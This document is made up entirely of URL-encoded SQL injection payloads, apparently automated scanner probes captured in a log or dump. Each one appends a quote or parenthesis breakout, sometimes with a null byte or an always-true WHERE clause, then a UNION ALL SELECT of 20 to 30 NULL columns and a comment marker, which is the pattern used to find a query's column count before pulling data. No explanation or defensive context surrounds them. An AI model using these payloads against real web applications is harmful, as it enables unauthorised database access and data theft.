1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%203612%3D3612%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%201128%3D1128%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%205053%3D5053%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%206057%3D6057%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%207704%3D7704%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%207948%3D7948%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%201849%3D1849%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%203725%3D3725%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%208052%3D8052%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%203961%3D3961%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202483%3D2483%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%203228%3D3228%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202501%3D2501%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%201549%3D1549%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%207898%3D7898%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204152%3D4152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204985%3D4985%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%203618%3D3618%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%205102%3D5102%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202196%3D2196%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%207744%3D7744%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%206219%3D6219%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%209985%3D9985%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%201887%3D1887%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%201505%3D1505%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%205496%3D5496%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%208247%3D8247%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%207326%3D7326%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%202312%3D2312%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203328%3D3328%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206317%3D6317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%201107%3D1107%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203088%3D3088%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%207738%3D7738%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203133%3D3133%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%209305%3D9305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%204176%3D4176%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206800%3D6800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%209054%3D9054%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%205921%3D5921%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209970%3D9970%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%206763%3D6763%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201306%3D1306%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%207352%3D7352%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201469%3D1469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209121%3D9121%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%205916%3D5916%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%205734%3D5734%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%206747%3D6747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201843%3D1843%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%204701%3D4701%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208826%3D8826%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206923%3D6923%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%207516%3D7516%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201139%3D1139%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206331%3D6331%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%209105%3D9105%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 